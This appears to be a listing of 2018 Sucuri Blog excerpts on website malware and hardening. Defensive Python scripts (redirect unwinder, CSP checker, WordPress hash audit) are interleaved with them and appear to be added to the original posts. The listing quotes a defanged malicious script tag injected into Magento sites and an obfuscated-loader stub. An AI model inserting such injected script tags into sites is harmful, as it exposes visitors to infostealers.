
Web Security

  • Steps to Keep Your Site Clean: Updates (24 April 2018)

    This is the second post of a series about Steps to Keep Your Site Clean. In the first post, we talked about Access Points; here we are going to offer more insight on Updates.


    Repeatedly we see websites infected or reinfected because important security updates were not taken seriously. Security updates exist because a vulnerability was found and fixed, and once the fix is public the hole is very likely to be probed on every site that has not applied it. Updating to the new version closes those holes before they are used against your site.

    Continue reading Steps to Keep Your Site Clean: Updates at Sucuri Blog.

  • From Baidu to Google’s Open Redirects (18 April 2018)

    Last week, we described how an ongoing massive malware campaign began using Baidu search result links to redirect people to various ad and scam pages.

    It didn’t last long. Soon after the publication of that article, the bad actors changed the links to use compromised third-party sites, and a couple of days later they began using Google’s URL shortening service.

    This is a snippet from their decoded script:

    The Redirect Chain

    If you check Google’s own information about that shortened URL, it shows that the URL redirects to another Google owned URL which looks quite benign.
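    The trick described above is that each hop looks harmless on its own: a shortener link, then a URL on a trusted domain whose query string carries the real destination. The following script, an added example that is not part of the Sucuri post, flags URLs whose query parameters embed another absolute URL and unwinds such a chain offline, without ever fetching anything. All hosts in it are constructed (`short.test`, `www.trusted.example`, `ads.attacker.test`); the redirector shape `?q=<url>` is a generic assumption, not the endpoint from the campaign.

```python
"""Offline check for open-redirect style URLs: a query parameter that itself holds an
absolute URL, possibly nested (shortener -> trusted-domain redirector -> ad page).
Added example with constructed hosts; nothing here touches the network."""
from urllib.parse import urlsplit, parse_qsl, quote


def embedded_targets(url):
    """Return (parameter, target_url) pairs where a query value is an absolute URL."""
    parts = urlsplit(url)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already percent-decodes one level; decoding again would destroy
        # the encoding that belongs to the next hop's own query string.
        candidate = value.strip()
        if candidate.startswith("//"):
            # protocol-relative target, resolved against the current scheme like a browser does
            candidate = parts.scheme + ":" + candidate
        target = urlsplit(candidate)
        if target.scheme in ("http", "https") and target.netloc:
            hits.append((name, candidate))
    return hits


def is_open_redirect_candidate(url):
    """True when some parameter points at a host other than the URL's own host."""
    own = (urlsplit(url).hostname or "").lower()
    return any((urlsplit(t).hostname or "").lower() != own
               for _, t in embedded_targets(url))


def unwind(url, max_depth=10):
    """Follow parameter-embedded hops without network access; returns the chain of URLs."""
    chain = [url]
    while len(chain) <= max_depth:
        targets = embedded_targets(chain[-1])
        if not targets:
            break
        chain.append(targets[0][1])
    return chain


def final_host(url):
    """Host of the last hop in the unwound chain: the page the visitor actually lands on."""
    return (urlsplit(unwind(url)[-1]).hostname or "").lower()


# Constructed chain: shortener -> benign-looking redirector on a trusted domain -> ad page.
FINAL = "https://ads.attacker.test/landing"
REDIRECTOR = "https://www.trusted.example/url?q=" + quote(FINAL, safe="") + "&sa=D"
SHORTENER = "https://short.test/r?to=" + quote(REDIRECTOR, safe="")

if __name__ == "__main__":
    for hop in unwind(SHORTENER):
        print(("SUSPECT " if is_open_redirect_candidate(hop) else "        ") + hop)
```

Only the parameter-embedded hops can be resolved offline; the shortener's own lookup (the first hop in the real campaign) needs a request, so in practice you would combine this with a HEAD request that does not follow redirects and feed each `Location` header back into `unwind`.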

    Continue reading From Baidu to Google’s Open Redirects at Sucuri Blog.

  • Malicious Activities with Google Tag Manager (17 April 2018)

    If I were to ask whether you could trust a script from Google that is loading on your website, the majority of users would say “yes” or even “absolutely”. But when malicious behavior ensues, everything should be double-checked and treated as suspect, even assets that come from “trusted sources” like Google, Facebook, and YouTube.

    In the past, we saw how AdSense was abused in a malvertising campaign. More recently, we saw attackers inject malware that called Google AdSense ads to generate revenue for themselves. There is, however, an even more troublesome part of the toolkit that Google offers to webmasters: Google Tag Manager.

    Continue reading Malicious Activities with Google Tag Manager at Sucuri Blog.

  • Content Security Policy (13 April 2018)

    As a website owner, it’s a good idea to be aware of the security issues that might affect your site. For example, Cross-site Scripting (XSS) attacks consist of injecting malicious client-side scripts into a website and using the website as a propagation method.

    You probably know, too, that client-side scripts can be programmed to do pretty much anything. They range from showing an alert message on your website or animating images to mining cryptocurrency or showing pop-ups for NSFW pharma products.
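    A Content Security Policy is the browser-side control for exactly this: it tells the browser which script sources may run, so an injected inline `<script>` or a tag pointing at an attacker's host is refused even if it made it into the HTML. To make the matching rules concrete, here is a small evaluator for the `script-src` directive, an added example rather than code from the Sucuri post. It deliberately simplifies the spec (ports, `'strict-dynamic'`, hash sources, report directives, and the rule that a nonce disables `'unsafe-inline'` are all ignored). The policies, origin `https://example.com`, nonce `r4nd0m` and the hosts in the usage below are constructed; it also serves the Google Tag Manager post above, because it shows that allowlisting `www.googletagmanager.com` is all CSP can do for you there.

```python
"""Minimal evaluator for the script-src part of a Content-Security-Policy header.
Added example; simplified on purpose (no ports, 'strict-dynamic', hashes or reporting)."""
from urllib.parse import urlsplit


def parse_csp(header):
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _host_source_matches(source, url):
    """Match one host-source (e.g. https://*.example.com/static/) against a script URL."""
    u = urlsplit(url)
    if source == "*":
        return u.scheme in ("http", "https")
    scheme, _, rest = source.rpartition("://")
    if scheme and scheme.lower() != u.scheme:
        return False  # https://host in the policy does not cover http://host
    host, slash, path = rest.partition("/")
    host, uhost = host.lower(), (u.hostname or "").lower()
    if host.startswith("*."):
        if not uhost.endswith(host[1:]):
            return False  # *.example.com matches sub.example.com, not example.com itself
    elif uhost != host:
        return False
    if slash and path:
        upath = u.path or "/"
        # a path ending in "/" is a prefix match, anything else must match exactly
        return upath.startswith("/" + path) if path.endswith("/") else upath == "/" + path
    return True


def script_allowed(header, page_origin, src=None, inline=False, nonce=None):
    """Would the browser run this script under the given policy?
    src: absolute URL of an external script; inline=True for <script>...</script> bodies;
    nonce: the nonce attribute on the script tag, if any."""
    policy = parse_csp(header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True  # no governing directive: CSP places no restriction on scripts
    if nonce and f"'nonce-{nonce}'" in sources:
        return True
    if inline:
        return "'unsafe-inline'" in sources
    s = urlsplit(src)
    for source in sources:
        if source == "'self'":
            if f"{s.scheme}://{(s.hostname or '').lower()}" == page_origin.lower():
                return True
        elif source.startswith("'"):
            continue  # 'none', 'unsafe-eval', hashes: grant nothing to an external src here
        elif source.endswith(":") and "://" not in source:
            if s.scheme == source[:-1].lower():
                return True  # scheme-source such as https:
        elif _host_source_matches(source, src):
            return True
    return False


# Constructed policies for a site at https://example.com that uses Google Tag Manager.
ORIGIN = "https://example.com"
STRICT = ("default-src 'self'; "
          "script-src 'self' https://www.googletagmanager.com 'nonce-r4nd0m'; "
          "object-src 'none'")
LOOSE = "script-src 'self' 'unsafe-inline' *"  # a common "fix" that makes CSP useless against XSS

if __name__ == "__main__":
    injected = "https://cdn.attacker.test/js/lib/js.js"  # constructed attacker host
    print("strict policy runs injected script:", script_allowed(STRICT, ORIGIN, src=injected))
    print("loose policy runs injected script: ", script_allowed(LOOSE, ORIGIN, src=injected))
    print("strict policy runs inline script:  ", script_allowed(STRICT, ORIGIN, inline=True))
```

The caveat a practitioner should keep in mind: once `www.googletagmanager.com` is in `script-src`, every tag that container loads is trusted by the browser, so CSP does not protect you from someone who gains access to your GTM account or injects a container ID of their own. Lock down the GTM account and review the container's tags; CSP only decides which hosts may serve script, not what the script does.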

    Continue reading Content Security Policy at Sucuri Blog.

  • Unwanted Ads via Baidu Links (10 April 2018)

    The malware attack that began as an installation of malicious Injectbody/Injectscr WordPress plugins back in February has evolved since then.

    Some of the changes were documented as updates at the bottom of the original blog post, however, every week we see minor modifications in the way they obfuscate the scripts or the files they inject them into.

    Encrypted WordPress JavaScript Files

    At this moment, the most common injection targets are core WordPress JavaScript files:


    Hackers add the malicious code and then obfuscate the entire file contents along with the original legitimate code so that the only way to clean the files without breaking the site functionality is to replace them with their original clean copies.

    Continue reading Unwanted Ads via Baidu Links at Sucuri Blog.

  • Hacked Website Trend Report – 2017 (6 April 2018)

    We are proud to be releasing our latest Hacked Website Trend Report for 2017.

    This report is based on data collected and analyzed by the Sucuri Remediation Group (RG), which includes the Incident Response Team (IRT) and the Malware Research Team (MRT).

    The data presented stems from the analysis of 34,371 infected websites summarizing the latest trends by bad actors. In this report, we build from data points seen in the 2016/Q3 report to identify the latest tactics, techniques, and procedures (TTPs) detected by the Remediation Group.

    Continue reading Hacked Website Trend Report – 2017 at Sucuri Blog.

  • Obfuscation Through Legitimate Appearances (4 April 2018)

    Recently, I analyzed a malware sample provided by our analyst Edward C. Woelke and noticed that it had been placed in a core WordPress folder as ./wp-includes/init.php. This seemed suspicious, since no file by that name exists in WordPress core.

    Deceiving Appearances

    I started with a standard analysis and my first thought was, this has to be a legitimate file! Nicely structured, with very legit-looking function names. It even used Object Oriented PHP, which doesn’t happen very often in the case of malware.
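    Both of the last two findings, a core JavaScript file re-obfuscated together with the injected payload (Unwanted Ads via Baidu Links) and a clean-looking PHP file planted where no core file of that name exists, fall out of the same check: compare the live install against a manifest of hashes taken from a clean copy. The script below is an added example, not Sucuri's tooling; the WordPress tree it audits is constructed in a temporary directory with stand-in file contents, and the "obfuscated" and "planted" files are likewise constructed.

```python
"""Audit a WordPress tree against a known-good manifest of core file hashes.
Modified core files (e.g. a re-obfuscated jquery.js) and files that should not exist
in core (e.g. wp-includes/init.php) both show up. Added example with constructed data."""
import hashlib
import os
import shutil
import tempfile

CORE_DIRS = ("wp-admin", "wp-includes")  # wp-content is site-specific and needs its own baseline


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """{relative path: sha256} for every file under the core dirs. Build it from a clean download."""
    manifest = {}
    for core_dir in CORE_DIRS:
        for dirpath, _, files in os.walk(os.path.join(root, core_dir)):
            for name in files:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = sha256_of(full)
    return manifest


def audit(root, manifest):
    """Compare a live install with the manifest. Returns sorted lists of relative paths."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p, h in manifest.items() if p in current and current[p] != h),
        "missing": sorted(p for p in manifest if p not in current),
        "unexpected": sorted(p for p in current if p not in manifest),
    }


def _write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as f:
        f.write(text)


def demo():
    """Constructed scenario: a clean copy, and a live copy with one re-obfuscated core JS
    file and one planted PHP file that does not exist in WordPress core."""
    clean, live = tempfile.mkdtemp(), tempfile.mkdtemp()
    try:
        core = {  # stand-ins for real core files; contents are constructed
            "wp-includes/js/jquery/jquery.js": "/* constructed stand-in for core jquery.js */\n",
            "wp-includes/js/wp-embed.min.js": "/* constructed stand-in for wp-embed.min.js */\n",
            "wp-admin/js/common.js": "/* constructed stand-in for common.js */\n",
        }
        for rel, body in core.items():
            _write(clean, rel, body)
            _write(live, rel, body)
        manifest = build_manifest(clean)
        # Attacker appends a payload and re-obfuscates the whole file: the legitimate code is
        # still in there, but the hash no longer matches, so the file must be replaced, not edited.
        _write(live, "wp-includes/js/jquery/jquery.js",
               "eval(function(p,a,c,k,e,d){/* constructed obfuscated blob */}('...'))\n")
        # Tidy, OOP-style PHP dropped under a name that has no counterpart in core.
        _write(live, "wp-includes/init.php",
               "<?php\nclass WP_Init_Loader { public function run() { /* constructed */ } }\n")
        return audit(live, manifest)
    finally:
        shutil.rmtree(clean, ignore_errors=True)
        shutil.rmtree(live, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The manifest has to come from a copy you trust (a fresh download of the same WordPress version), never from the server under investigation, or the attacker's files become the baseline. For real installs WP-CLI's `wp core verify-checksums` does the same comparison against the official checksums, including reporting files that should not exist; the point of writing it out is to see that "looks legitimate" is irrelevant to the check, only the hash and the path are.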

    Continue reading Obfuscation Through Legitimate Appearances at Sucuri Blog.

  • What is Virtual Hardening? (26 March 2018)

    If you want to make your website security more robust, you need to think about hardening. To harden your website means to add layers of protection that reduce its attack surface. Hardening usually involves manual work: adding code or changing configuration. Virtual hardening means letting a Web Application Firewall (WAF) or security plugin apply those protections automatically, in front of or inside the site, instead of editing it by hand.

    The concept of hardening is part of a defense-in-depth strategy that protects your web server and database from vulnerability exploitation.

    Continue reading What is Virtual Hardening? at Sucuri Blog.

  • GitHub Hosts Infostealers Part 2: Cryptominers and Credit Card Stealers (21 March 2018)

    Update – March 28th, 2018:

    The fake Flash update files referenced in this post have been moved from GitHub to[.]tl, and the bit.wo[.]tc script to byte.wo[.]tc.

    A few days ago, we reported that hacked Magento sites had been pushing infostealing malware under the disguise of Flash player updates.

    In this post, we’ll reveal how this recent attack is related to an extremely hot topic – cryptocurrencies and cryptomining.

    Continue reading GitHub Hosts Infostealers Part 2: Cryptominers and Credit Card Stealers at Sucuri Blog.

  • GitHub Hosts Infostealer (15 March 2018)

    A few months ago, we reported on how cybercriminals were using GitHub to load a variety of cryptominers on hacked websites. We have now discovered that this same approach is being used to push binary “info stealing” malware to Windows computers.

    Infected Magento Sites

    Recently, we identified hundreds of infected Magento sites with the following injected script:

    <script type="text/javascript" src="https://bit.wo[.]tc/js/lib/js.js"></script>

    The contents of the js.js file included:

    This code creates a hidden div and after a short delay displays a fake Flash Player update banner above the normal site content.

    Continue reading GitHub Hosts Infostealer at Sucuri Blog.

  • Steps to Keep Your Site Clean: Access Points (13 March 2018)

    Unfortunately, most website owners know what it’s like to have a site hacked – the panic, the rush to find anyone out there that can help, and the worry it causes. Maybe you were able to get your site back on track or had a company clean the site for you, but the important thing is that your site is finally safe, or so you thought.

    Avoid Website Reinfections

    There are many ways in which a site can become reinfected after a cleanup.

    Continue reading Steps to Keep Your Site Clean: Access Points at Sucuri Blog.